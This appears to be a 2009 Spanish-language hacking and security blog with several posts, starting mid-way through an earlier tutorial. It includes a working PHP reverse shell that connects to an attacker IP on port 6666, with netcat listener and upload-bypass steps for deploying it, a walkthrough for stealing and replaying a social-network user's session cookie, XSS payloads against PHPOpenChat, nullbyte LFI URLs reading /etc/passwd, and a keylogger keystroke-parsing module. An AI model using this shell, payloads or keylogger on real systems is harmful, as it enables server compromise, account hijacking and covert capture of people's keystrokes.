'id' int(11) NOT NULL auto_increment,
'usuario' varchar(15) NOT NULL,
'email' varchar(15) NOT NULL,
'emailalternativo' varchar(15) NOT NULL,
'contraseña' varchar(150) NOT NULL,
'contraseñaa' varchar(150) NOT NULL,
KEY 'id' ('id')
) ENGINE=MyISAM;

INSERT INTO 'myhosting_usuarios' VALUES (1, 'SecurityKill', 'mymail@gmail.com', 'mymail2@gmail.com', 'mypass', 'mypass');






9.) Despedida



Bueno señores ya hemos terminado este tutorial quizás muchos no entendieron

Y otros si me entendieron traten de hacer lo mejor por dar una buena explicación

Pero recuerden que no todo se pone tan fácil, Bueno en este tutorial compartí gran

Parte con mi hermano zero bits que su parte quedo maravillosa lo se porque lo lei


Me gustan las críticas así que espero las críticas tutorial escrito a mano todo los derechos del autor reservados y los códigos no todos son nuestros por eso hemos

Puesto en algunos la fuente les deseo un gran fin de semana…



No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que

Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…



Group’s Ethical.



Zero Bits

KuTer


Jeferx

Darki113r

_84kur10_

ShadinessDark



Mi team V1rtu@l VIRu$ Bl@ck Team

Zero Bits is New!

Primero que nada me siento alagado al estar en este BLOG junto a mi amigo y nuevo compañero DEDALO/DR. WHITE, que me haya llamado para escribir aquí junto a él.


Algunos lectores de aquí me podrán haber conocido de otras comunidades y a los que no bueno, me hago llamar en el mundo de la SEGURIDAD INFORMATICA: Zero Bits, soy venezolano, andaba un poco alejado de la RED y las COMUNIDADES ya que andaba FULL ESCUELA y no me daba tiempo.


Como sabrán los que ya antes, los que han leído mis PAPERS, que lo que más estudio en este mundo serian el PENTESTING y La Seguridad a nivel WEB.


Y pues ya que saben un poco de mi, espero poder resolver sus dudas junto al dr.white y poder compartir mi conocimiento con ustedes y me reciban bien!


Se despide, Zero Bits.

Cookie Poisoning

En ocaciones anteriores he puesto dos cosas que se van a relacionar con el cookie poisoning, el Session Fixation y el robo de cookies por un Xss


Bueno primero lo que necesitamos...

- Paciencia
- iniciativa
- Curiosidad


Ahora si...


Lo primero que haremos es recordar como robar cookies click aquí ahora si con eso conseguimos la cookie listo ya tendriamos la mitad del tutorial... ahora... se me ocurre darles un ejemplo mas real...

Estamos en Caralibro.com una red social excelente... ellos usan unas cookies que hacen que confirmen que usuario somos... si vieramos el arhchivo de la cookie veriamos algo asi...

vhernandezviteri%3A7815696ecbf1c96e6894b779456d330e


el nombre de la versona es victor hernandez viteri, digamos que de el queremos obtener su cookie ahora caralibro tiene un xss en una aplicación bien interesante...

ahora le vamos a robar la cookie, sigan el tutorial y podrán hacerlo fácilmente una ves que tenemos la cookie ahora viene la parte nueva para ustedes o para algunos... a diferencia del session fixation la session la puedes poner por medio de headers e inclusive con javascript pero en este caso el cookie poisoning debemos sustituir la COOKIE del archivo de la COOKIE, hay herramientas, pueden buscar addons de mozilla firefox con los cuales se pueden editar las cookies...


como ven en el anterior ejemplo:

cgaldosdedalo%3A7815696ecbf1c96e6894b72hd9sj5ndk

eso es lo que veremos en la cookie de caralibro.com

ahora con el addon lo podemos sustituir y ponernos cualquiera... y si hemos conseguido robarsela a victor entonces... podemos ponernosla...

vhernandezviteri%3A7815696ecbf1c96e6894b779456d330e

si nos ponemos esa cookie y luego vamos a caralibro.com podremos entrar con su usario y hacer todo como si fuesemos el...

en conclusión:

cookie poisoning es casi lo mismo que session fixation pero la manera de asignarnos la cookie es diferente...


viendolo desde otro ángulo:

he tenido la oportunidad de ver en páginas del gobierno peruano que el login esta en JavaScript y te piden una cookie como seguridad que sería bypasseable de esta manera...

hay muchas maneras de poder usar esto y el session fixation por eso es importante como advisor yo les diría que usen sessions y las configuren bien, las cookies son un poco inseguras...


Saludos
Dr.White

Metaspl0it 3.3.3 Actualizemos!!!



Como muchos yo uso el metaspl0it, la mayoría creo que lo sabe... y hoy hace unas horas ha salido la nueva versión 3.3.3 con algunas cosas que le dan una mejor perspectiva a lo que es metaspl0it, el expl0it ranking es lo mejorcito que he visto...


Sin mas que decirles les voy a dejar la descarga:

http://www.metasploit.com/framework/download/



también podemos actualizar nuestro metaspl0it... actualizamos con el msfupdate... mm bueno para que puedan ver los nuevos features que nos trae nuestro queridisimo metaspl0it entonces se los dejo aquí:


click aquí para verlo


Espero les guste yo lo estoy probando en windows y en un rato me lo descargo para testearlo en Linux...



Saludos
Dr.White

martes 22 de diciembre de 2009

Full Path Disclosure en FaceBook

Bueno el video lo dice todo pero una previa es que encontré un FPD lo he reportado ya en Facebook y estoy usando este video como una especie de POC... para repararlo podriamos usar algo como is_array() pero no se depende de su imaginación...





Saludos
Dr.White

lunes 21 de diciembre de 2009

New Bug In PHPOPENCHAT by Dedalo

Bueno por ahora solo está en exploit-db pero como esta un poco mal hecha la distribución del texto entonces por eso lo voy a poner aquí


1.- Preview

This web APP is Vulnerable to xss in its instalation file but you can misconfigurate all the
code with this bug also, you must see to understand...


2.- Vulnerable Code

function database_setup(){


if( isset($_POST['form_data']) ){

$host = (string) $_POST['DATABASE_HOST'];

$user = (string) $_POST['DATABASE_USER'];

$pass = (string) $_POST['DATABASE_PASSWORD'];

$tabl = (string) $_POST['DATABASE_TABLESPACE'];

$prefix = (string) $_POST['DATABASE_TABLE_PREFIX'];





3.- Expl0tation
First Bug its where you just post data without nothing in security so you can put in the
host textbox on the install.php?step=2 "><script>alert(1337)</script> in which usually
is written localhost and in other .php files (install.php) they show $host so the Xss its
notable...


4.- More Vuln Code...


$this->set_conf_property('DATABASE_HOST', $host);


you may think theres no problem with this step but...
if you write the DATABSE_HOST with host being explotated it could be...interesting...


5.- MORE

define('DATABASE_HOST', 'localhost');


This is the execelent example to show you how it can work like a PHP DROP...

just put something like "><script>alert('d3d4l0')</script> in the DATABASE_HOST textbox

and excecute, just refresh and...

Path Disclosure...

\openchat\config.inc.php on line 135

6.- Gr33tz:

http://www.seguridadblanca.org - WCuestas - Chelano - Perverths0 - SeguridadBlanca READERS
- Exploit-DB && FRIENDS =)


====================
31337 HAPPY HACKING
====================


ese es el paper... también se los pongo en pastebin

den click aquí para verlo en pastebin



Saludos
Dr.White

Como mantenernos actualizados en seguridad

Hoy les voy a enseñar lo que yo hago básicamente para saber de los nuevos bugs que salen a diario y que es lo que muchos deberían hacer...

Primero debemos crearnos una cuenta de correo de gmail...


ahora vamos a ir a http://www.securityfocus.com/ y en el sidebar de la derecha podremos apreciar un lugar para que nos llegue el feed al mail, ahi ponen mucho sobre seguridad informatica, ahora vamos a crearnos una cuenta en twitter con el correo, la pueden creas en www.twitter.com ahora van a seguir solo dando click el boton de follow a exploit-db...


ahora lo que haremos será leer el feed de hispasec, como ven aquí no hay para poner nuestro email entonces haremos algo mejorcito, como tenemos nuestro correo de gmail usaremos el google reader para hacer este proceso, lo que deben hacer es leer esto y bueno eso con respecto a lo que son vulnerabilidades y medio actualización en soft, ahora...

como ya conocemos que hacer en la suscripción por mail vamonos por actualización de seguridad en general con Segu-INFO en el sidebar de la izquierda podemos ver que hay para poner nuestro mail... ahora securitybydefault a ellos los puedes seguir en twitter o suscribirse en el sidebar... ahora si ya solo nos faltan tutoriales...


empesemos con seguridadblanca vamos al sidebar y al principio lo veran, la cajita de texto y ya saben que hacer... también me pueden seguir en twitter dando click aquí ahora uno de los mejorcitos en tutoriales avanzados...elladodelmal en ese blog también miren el sidebar y pongan su mail y les llegará lo que escriba... ahora ya casi estamos listos... nos toca pentesters esta web es excelente y tiene tanto tutoriales avanzados como básicos y resoluciones de retos...


haciendo esta pequeña colección de feeds pueden estar actualizados lógico deben buscar sus webs ustedes también pero con estas pueden estar comodos y actualizados, antes usabamos milw0rm pero desde que no se volvió a actualizar la mayoría de bugs estan en exploit-db pero tambien los pueden enviar a packetstormsecurity quienes podemos seguir en twitter para mantenernos al tanto de todo...


Espero esto les sirva...


Saludos
Dr.white

domingo 20 de diciembre de 2009

Con la Navidad se prende el malware




Con la llegada de la navidad el phishing abunda de diferentes maneras... como es conocimiento de algunos uso un mail y me suscribo a todos los lugares que puedo para recibir spam y publicidad para analizar... el día de hoy me han llegado los primeros mails... el primero que me llego o que leí fue uno que supuestamente era una carta de mi "mama" quien falsifique su nombre en un sitio web que no recuerdo y bueno la cosa es que la carta era de parte de ella, intente ver la carta y no podía... investigue un poco mas el correo y di con que era un muy viejo malware que intentaba probar la versión de tu mozilla firefox... no fue gran cosa pero habían otros que eran cartas de siertos amigos pero la cosa es que estos "amigos" no eran reales o en caso de que si lo eran me mandaban targetas.EXE, si recordamos un poco Jbyte hizo hace un tiempo un analisis de una targeta y fue interesante...


A lo que voy realmente con esta entrada es que tengan cuidado, no solo nos podemos infectar de esta manera, los archivos que se pasan por msn en estas fiestas también son muy frecuentes y pues debemos tener cuidado no solo de infectarnos por el lado de nosotros sino por otros también, en estas fechas llega la familia a la casa y pues en estas ocaciones como me ha ocurrido los tios, tias, primos, primas, etc piden la PC para revisar "algo" sin embargo en los momentos de ver "algo" nos podemos infectar... para los que estamos en seguridad y para los que no, nos afecta...

imaginemos a nuestro tio mañuco jajaja en una web PORNO justo el día de Navidad o quizás mas real sería año nuevo... un malware de una página de porno malo y gratis...

Ahora la tía soltera que está suscrita a muchos chats... también hay que tener cuidado, bueno depende de los chats...

Ahora los que tienen sobrinos o primos pequeños tengan mucho cuidado con webs de gamming, estas muchas veces tienen malware y grande...


Ahora con respecto a otras cosillas en la navidad también las cosas se ponen interesantes... el malware abunda por lo que podemos investigar y todo se pone interesante, podremos analizar mas malware... podremos encontrar codigos interesantes, los que trabajen en AVs tendrán mucha acción...

Para los que quieren saber como protegerse pues tengan cuidado con los correos de publicidad en especial cuando ustedes usan hotmail hay veces que el spam llega a la bandeja de entrada... para lo de la familia les recomiendo ponerle como navegador un navegador bien configurado y pues si quieren un usuario en su pc exclusivo para ellos donde las politicas de seguridad sean mas estrictas, traten de ponerle un proxy a su navegador...



Espero les sirvan estos consejos en navidad para el Malware

viernes 18 de diciembre de 2009

Sql Injection en ASP

Bueno aquí he hecho un video, la calidad no es tan buena por eso les voy a poner el bloc de notas que use... también les quiero mostrar hoy como se ve una ataque desde el lado de un atacante por que no es bueno solo saber el lado del que protege ya que debemos estar continuamente actualizandonos y debemos de tener experiencia y saber por donde pueden entrar los "malos"...

sin mucho mas que decir... aquí está el video...





Lo que dice el Bloc de notas del video lo pueden ver dando click aquí

tambien le he agregado unas cosas cheveres al video para entenderlo un poco mas...


Espero les guste el video...



Saludos
Dr.White

Streaming de Informática...

Cita de Codebit.org:

El dia 27 de diciembre a las 4:00 pm Hora Ciudad de México (GMT -6) se realizara un evento via streaming encabezado por paginas como:

Primer evento:
www.codebit.org --> Wargame para aprender desde cero. encabezada por hdstryOwrld


Posteriores capitulos:
www.sinfocol.org --> Mundo de la seguridad informatica. encabezada por Hades (Esperamos puedan confirmar su asistencia)
www.n3ur0n4.org -->pagina de @135747
www.seguridadblanca.org --> Página de seguridad informática, encabezada por Dedalo.

El primer evento pautado sera: de Marketing web y tecnicas SEO (posicionamiento en la web)



La pagina donde se transmitira este primer evento será en:

http://www.ustream.tv/channel/seo-web-marketing



Fin de la cita...


Como ven esto será muy interesante se haran charlas de seguridad informática, SEO, Informática en general, trucos y muchas cosas mas... si desean apuntarse entonces deben de ir a codebit.org y listo deben de buscar el tema o crear uno diciendoselo a hdstryowrld...


Espero se apunten...


Saludos
Dr.White

jueves 17 de diciembre de 2009

PenTest Reverse Shell con PHP y NETCAT

La mayoría de los que andan en el hacking, la seguridad informatica y/o la rama de la informática seguramente alguna ves ha escuchado del NMAP, el nmap viene en un paquete con otra herramienta, excelente herramienta para conexiones remotas, se llama NetCat, el netcat nos ayuda en muchas cosillas, entre ellas está el ver headers, hacer conexiones remotas, poner en escucha servidores y sinceramente es una t00l que se necesita en el pen-test...


Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...



lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php


http://www.h4x0r.com/upload.php?user=dedalo

despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:


http://www.h4x0r.com/upload/data/users/dedalo/shell.php


Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...


La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:


<?php



/*para esto podemos usar fputs o fwrite*/



set_time_limit(0);



$msgin = "SeguridadBlanca Remote Shell";

$sock = fsockopen("IP", 6666);



fputs($sock, $msgin);



while(1){

$back = fgets($sock, 6666);



  if($back){

    $sys = system($back);

    fputs($sock, "$sys\n\n");

  }

}

// By Dedalo From SeguridadBlanca

?>



que pueden encontrar en pastebin también dando click aquí


como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...

http://www.h4x0r.com/upload/data/users/dedalo/shell.php

cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...


Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...


Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...


ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...

como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...

con el nc nos pondremos en escucha con la siguiente sintaxis...

ncat -v -l -p 6666

ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:

http://www.h4x0r.com/upload/data/users/dedalo/shell.php


ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...


espero haya estado claro el tutorial...


Dudas?

Saludos
Dr.White

miércoles 16 de diciembre de 2009

LEASEWEB

Hoy mientras estaba tratando de hacer un buen trabajo como alumno y como conocedor de seguridad pues quería actualizar el mozilla firefox di con un extenso como se dice... repertorio de muchas cosas entre ellas Firefox... muchos ya seguro sabian de esto pero yo recien me doy cuenta de esto... LEASEWEB es una web con servicio de hosting, VPS y mucho mas entonces cuando el PROXY del colegio administrado por HENRY (Excelente Administrador) me bloqueo la descarga di con que realmente no descargabamos del Host de mozilla...


Nosotros Descargamos de LEASEWEB es decir de un subdominio de LEASWEB conocido como mirror.leaseweb.com lo curioso de esto es que yo deduzco no ha de ser normal poder viajar por los directorios ya que esto se puede considerar como fallas pues encontre mirrors de muchisimas cosas entre ellas lo de firefox...


Click Aquí para ver los mirrors, se encuentran muchas cosas en estos mirrors pero yo directamente estaba aquí que si prestamos atención entonces podemos ver que se ven muchas versiones de FIREFOX, pero como les dije anteriormente se pueden viajar por los directorios hasta llegar al anteior link de los mirrors donde podemos encontrar files de nuestro queridisimo backtrack que pueden ver dando click aquí


Cosas como Releases de UBUNTU y mucho mas... de los mas interesante fue que hasta archivos un poco tránsfugos de windows encontré, puedes verlos dando click aquí bueno ustedes pueden ver por ahí lo que quieran y esto pues les puede servir para que cuando necesiten un ISO o algo de una distro la puedan hayar con facilidad en este repertorio...


Se que no es el GRAN DESCUBRIMIENTO pero esto les puede ayudar a encontrar siertos Archivos utiles para ustedes, versiones antiguas que no se encontraban con facilidad que se pueden usar para practicar y mucho mas...


Espero les sirva este Repertorio...



Saludos
Dr.White

lunes 14 de diciembre de 2009

Nuestros Inicios Según Dr.White

John Drapper AkA Captain Crunch, un nombre que la mayoría de los que estan en el ámbito de seguridad ignoran pero es el padre del Hacking el "primero" en vulnerar un sistema... El fue el Creador de la Caja Azul o también conocida como BlueBox, Este aparato permitia Phreakear los sistemas telefonicos de manera que por medio de inyección de tonos se permitian hacer llamadas gratis y a cualquier lugar... el fue arrestado por esta actividad sin embargo salio de prisión a seguir en el mundo de la informática.


El apodo se le da por que previo a inventar el Exploit, La caja azul, los tonos se generaban con un pitito que venia en las cajas del dicho cereal...


Imagen de la caja azul:




Imagen del Captain Crunch:




Ahora el Segundo BlackHat que mas a tenido efecto en la historia del Hacking... Kevin Mitnick, Fue buscado durante años por el FBI, CIA y otros por haber entrado en Computadores de los Gobiernos de estados unidos, también famoso por saber hackear mentes... Ingeniería Social...





Ahora los White hats... mas famosos... entre ellos pes voy a ponerles los que se destacan en el Open-Source el Mas famoso y me modelo a Seguir ^^ Richard Stallman...
El fundador del proyecto Open Source...





Otro "HACKER" es Steve Wozniak, Co-Fundador de Apple pero antes, en sus inicios antes de entrar al mundo de los ordenadores creaba Cajas Azules como las antes mencionadas y las vendia, el Arte se lo Enseño John Drapper y pues luego de un tiempo comenzó apple con sus ordenadores y toda la historia de los piratas de silicon valley...


Una imagen de Steve Wozniak:





mas información sobre silicon valley:

Click Aquí


Hackers Según Wikipedia:

click Aquí



Saludos
Dr.white

Análisis Forense en Perú - llegó tu hora de aprender.

Sin mucho que decir pues el Staff de Mente-Criminal un excelente blog orientado al análisis forense está apoyando para tener un perú con mejor desarrollo en el ámbito informático y en el análisis del mismo...

Curso:
INFORMATICA FORENSE
Aspectos practicos y metodologicos de los delitos informaticos

Dirigido a:
Profesionales en tecnologías de la información,
miembros de equipos de respuestas a incidentes,
administradores de seguridad de la información
Abogados, cualquier interesado en investigaciones de computo forense.

Dias: 27,28,29 y 30 de Diciembre
Horas: 09:00 - 14:00 hrs

Lugar:
Laboratorio Media Solutions Peru
Calle Catalina Huanca 120
San Isidro

Inversion:
Profesionales $150.00 dolares americanos
Afiliados IIF: $70.00 dolares americanos

Inversion e Inscripciones:

Telefono: 4014084 / 991435643
http://www.institutoforense.com/moodle
institutoforense@hotmail.com
cchavez@institutoforense.com

Programacion disponible en:
http://www.scribd.com/doc/24091199/programa-informatica-forense



Fuente directa y mas información:

Click aquí



Espero poder ir y vernos ahí...



Saludos
Dr.White

domingo 13 de diciembre de 2009

Lectura de Teclas

antes que todo disculpen la inactividad del blog pero por motivos personales me ha costado escribir... mm bueno aquí les dejo un pedazo de un módulo con el que podrían crear un programa de lectura de teclas, con este code les quiero ahorrar tiempo a las personas que vayan a crear programas de lectura de teclas como dije anteriormente... también keylogger para control parental o cosas de este tipo:



Public Function ParseText(KeyCode As Integer, Shift As Integer, CapsLock As Integer) As String
On Error Resume Next
If CapsLock = 1 Then Shift = 1
Select Case KeyCode
'Enter key
Case 13
ParseText = vbCrLf

'A-Z
Case 65 To 90
If Shift = 0 Then
ParseText = LCase(Chr(KeyCode))
Else
ParseText = UCase(Chr(KeyCode))
End If

'0-9
Case 48
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "="
End If
Case 49
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "!"
End If
Case 50
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "@"
End If
Case 51
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "#"
End If
Case 52
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "$"
End If
Case 53
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "%"
End If
Case 54
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "&"
End If
Case 55
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "/index.html"
End If
Case 56
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "("
End If
Case 57
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = ")"
End If

' 0-9
Case 96
ParseText = "0"
Case 97
ParseText = "1"
Case 98
ParseText = "2"
Case 99
ParseText = "3"
Case 100
ParseText = "4"
Case 101
ParseText = "5"
Case 102
ParseText = "6"
Case 103
ParseText = "7"
Case 104
ParseText = "8"
Case 105
ParseText = "9"

'NumberPad
Case 144
ParseText = "{Num Lock}"
Case 111
ParseText = "/index.html"
Case 106
ParseText = "*"
Case 109
ParseText = "-"
Case 107
ParseText = "+"
Case 110
ParseText = "."

'Misc Keys
Case 145
ParseText = "{Scroll Lock}"
Case 19
ParseText = "{Pause/Break}"
Case 45
ParseText = "{Insert}"
Case 36
ParseText = "{Inicio}"
Case 33
ParseText = "{Re Pag}"
Case 46
ParseText = "{Supr}"
Case 35
ParseText = "{Fin}"
Case 34
ParseText = "{Av Pag}"


'Arrow Keys
Case 38
ParseText = "{Arriba}"
Case 37
ParseText = "{Izquierda}"
Case 39
ParseText = "{Abajo}"
Case 40
ParseText = "{Derecha}"
Case 44
ParseText = "[Impr Pant]"
'Function Keys
Case 112
ParseText = "{F1}"
Case 113
ParseText = "{F2}"
Case 114
ParseText = "{F3}"
Case 115
ParseText = "{F4}"
Case 116
ParseText = "{F5}"
Case 117
ParseText = "{F6}"
Case 118
ParseText = "{F7}"
Case 119
ParseText = "{F8}"
Case 120
ParseText = "{F9}"
Case 121
ParseText = "{F10}"
Case 122
ParseText = "{F11}"
Case 123
ParseText = "{F12}"

Case 27
ParseText = "{Esc}"
Case 9
ParseText = "{Tab}"
Case 20
ParseText = "{Caps Lock}"
Case 160
'ParseText = "{LeftShift}"
Case 161
'ParseText = "{RightShift}"
Case 17
ParseText = "{Ctrl}"
Case 91
ParseText = "{Win Key}"
Case 92
ParseText = "{Win Key}"
Case 164
ParseText = "{Alt}"
Case 165
ParseText = "{Alt}"
Case 32
ParseText = " "
Case 8
Form_key.Text_key.Text = Left(Form_key.Text_key.Text, Len(Form_key.Text_key.Text) - 1)

'caracteres especiales
Case 189
If Shift = 0 Then
ParseText = "-"
Else
ParseText = "_"
End If
Case 187
If Shift = 0 Then
ParseText = "="
Else
ParseText = "+"
End If
Case 219
If Shift = 0 Then
ParseText = "?"
Else
ParseText = ","
End If
Case 221
If Shift = 0 Then
ParseText = "¿"
Else
ParseText = "¡"
End If
Case 186
If Shift = 0 Then
ParseText = ";"
Else
ParseText = ":"
End If
Case 222
If Shift = 0 Then
ParseText = "'"
Else
ParseText = """"
End If
Case 188
If Shift = 0 Then
ParseText = ","
Else
ParseText = "<"
End If
Case 190
If Shift = 0 Then
ParseText = "."
Else
ParseText = ">"
End If
Case 191
If Shift = 0 Then
ParseText = "/index.html"
Else
ParseText = "?"
End If
Case 220
If Shift = 0 Then
ParseText = "\"
Else
ParseText = "|"
End If
Case 192
If Shift = 0 Then
ParseText = "`"
Else
ParseText = "~"
End If
Case 226
If Shift = 0 Then
ParseText = "<"
Else
ParseText = ">"
End If
End Select
End Function




el código no está 100% hecho por mi fui recolectando pedasos de lugares para armar un código de uso optimo para la captura de teclas... espero les sirva... yo ya lo probe en multiples ocaciones y funciona a la perfección...


Suscribanse ;)



Saludos
Dr.White

viernes 11 de diciembre de 2009

Metaspl0it 3.3.2 Actualizemos!!!

Actualizando la base de datos y algo en el código asumo, han sacado una nueva versión de metaspl0it. recien me estoy actualizando hoy ya que ayer no tube tiempo de entrar en la compu para hacer nada...





yo aun estoy leyendo los cambios que se han hecho por eso inferí al principio de esta entrada sin e,bargo aquí les dejo el link para que vean que cosa se actualizo...


bueno como ya es verdad que hay release entonces les dejo el link de la web de metaspl0it y la descarga...


link a la web---> click aquí

Link a la descarga--> click aquí


Saludos
Dr.White

miércoles 9 de diciembre de 2009

Nullbyte Poisoning

Algunos de ustedes ya han escuchado del nullbyte poisoning, que se usa para bypassear que si, que no pero cuantos de ustedes realmente saben que hace el nullbyte? mmm pues hoy les voy a explicar por que se bypassea con este caracter, lo primero que deben saber es que las magic_quotes deben estar en OFF, ahora si, empezemos...


primero el código PHP vulnerable:

$include = $_GET['include'];
require_once("/var/www/include.html");


Como ven, masomenos se puede entender el código, lo que se hace un GET:


http://www.vuln.com/index.php?include=


pero en la siguiente linea dice que el archivo que traigan va a ser un .php


es decir, lo que sea que traigan será interpretado por el servidor asi:


http://vuln.com/index.php?include=archivo.php


sin embargo nosotros podriamos explotar un LFI haciendo algo asi:


http://www.vuln.com/index.php?include=../etc/passwd<>


ahora el nullbyte en una situación como la antes dada también podriamos usarla para descargar cosas de la siguiente manera...


http://www.notfreedownloads.com/index.php?include=ventas.php


si el tipo de arriba tuviese los archivos en su host entonces podriamos hacer algo como:


http://www.notfreedownloads.com/index.php?include=../ventas/programas/500dolares<>exe


entonces los ejecutables (.exe) que esten en 500dolares podrian ser nuestros en tan solo unos segundos, los directorios los podemos descubrir de manera manual o usando t00ls como acunetix que te facilitan el trabajo, así también como les enseñe se puede usar el nullbyte para llamar archivos con sierta extensión... no solo archivos de configuración... hay retos en internet de LFI que necesitan usar el nullbyte poisoning entre ellos un reto de codebit y otro en seguridadinformatica en el de seguridad informatica ponen en práctica el último ejemplo que di...


Espero con esto les quede un poco mas claro de como es el nullbyte poisoning, también es un ataque que se puede hacer en ASP pero no lo voy a explicar por que haré un tuto de Sql Injection en Asp.Net que necesitará nullbyte poisoning o quizas en otro tuto de nullbyte pero los codigos son básicamente iguales...



lamentablemente blogger no deja poner los nullbyte pero sustituyan <> por el nullbyte que es signo de porcentaje y dos ceros % 00 solo que todo junto


casi lo olvidaba, como protegerse pues no es tan dificil...

un str replace estará bien pero pueden hacerlo con un str_replace cambiando el chr(0) que es el nullbyte...


Saludos
Dr.White

lunes 7 de diciembre de 2009

IDS ¿Quien quiere entrar hoy?

ids (Intrusion Detection System) Como dice el título en Ingles es un Sistema de Detección de Intrusos...como a muchos nos ha pasado un día haciendo un netstat -a hemos visto una actividad un poco extraña y hemos llegado a la conclusión "hay un hacker" hacerca de esto pues un hacker no es ese que se te cola al sistema para hacerte daño pero si ahora mismo nos ponemos a discutir sobre filosofía de la historia de los hackers llegaríamos a mucho tiempo de estar discutiendo...


Pero para ese tipo de situaciones existen los IDS y/o IPS, mm un IDS que es de los que hablaremos es un tipo de herramienta mediante la cual podemos detectar a un intruso ya sea en nuestra red o en nuestra PC, normalmente estos ataques estan hechos por gente que usa expl0its para entrar pero nadie quita que lo pueda estar haciendo de manera manual...


Explicaré un poco el funcionamiento del IDS...Lo que hace nuestro IDS es hacer un continuo escaneo de nuestra PC o Red para estar al tanto de siertas actividades fuera de lo común, puede ser una mala conexión, raw data, un port scanning o algo que segun los algorítmos que use el IDS sea considere peligroso, los IDS funcionan parecido a un antivirus, se van actualizando segun los nuevos errores que se vayan encontrando y que puedan representar como una amenaza para su sistema.


Ahora que problema tienen los IDS... Pues los IDS no siempre son exactos para encontrar a los "Hackers", otra cosa es que los IDS lo que hacen es encontrar pero no eliminar es decir el IDS como ejemplo, te hara saltar una ventana que diga "ha sido encontrada una intrusión por el puerto 23" ese mensaje ha sido creado por mi imaginacion no es real pero en el caso de que lo fuera el IDS lo único que haría sería decirle eso pero no haría nada al respecto por eso el IDS se debe convinar con un Firewall o un dispositivo de enlase Internet <----> PC...


Hoy les quería hablar del SNORT este es un IDS muy interesante, lo que lo hace interesante antes que todo es que es Open-Source, esto quiere decir que lo podemos acomodas un poquito... el Snort cumple función de IPS y IDS es decir que te da consejos y aplica los consejos de seguridad para prevenir un ataque pero en el caso que se de el snort también te dice que es lo que esta pasando. El Snort, es cómodo y fácil de user, yo lo tengo puesto en mi Windows XP y pues eso convinado con un firewall y una configuración a mano hace un poco difícil que no me de cuenta si alguien esta adentro aun que como dije a todos nos ha pasado.


Dando Click aquí y les recomiendo como usuarios de Linux y Windows que usen mejor el Snort con Linux, es mas compatible, eso y una buena configuración de IP tables haría que todo este perfecto...


mas adelante haré un tutorial de como hacer una convinación de firewall e IDS para una seguridad respetable pero no invulnerable en sus PCs, por ahora pueden usar el Snort pero si quieren otros pueden comprar en algunos lugares online solo busquen en google...



Saludos
Dr.White

Monitor WebSec

Hola los saluda Jbyte a continucacion les traigo un exelente herramienta desarrollada por mi con la cula podremos monitorear en tiempo nuestro web site:

Aqui veremos como es la interfas grafica de la herramienta







En el cacillero de Pagina Web pondremos la web a la cual queremos monitorear
En el cacillero de Patron pondremos alguna cadena de texto que este dentro de la web

Si el sistema es atacado nos mostrar el siguiente mensaje






Lo cual no alertara que nuestro site esta siendo atacado y nos mostrara la web q a sido atacada.
Como ven el funcionamiento es muy facil y sencillo pueden descargar la herramienta de aqui.

Link de descarga: http://www.mediafire.com/?zne0dgjnyny

Saludos Jbyte

domingo 6 de diciembre de 2009

Pentest: Insecure Cookie Handling

No había tenido imaginación para escribir en los últimos dias pero hoy me desperte y un amigo me estaba pidiendo ayuda con una Sql Injection, despues de un rato de salir a comprar un te helado entre a una web que tenía este error así que hoy les voy a explicar masomenos el funcionamiento de ese bug.


Lo primero vamos a ver la linea de código que le asigna una COOKIE a digamos el administrador

setcookie("testcookie","1");


Ahora como vemos ya sabemos que la cookie se llama testcookie pero por ahora no nos vamos a fijar en eso...

miren este code:

if($_COOKIE['testcookie']=="1")
{
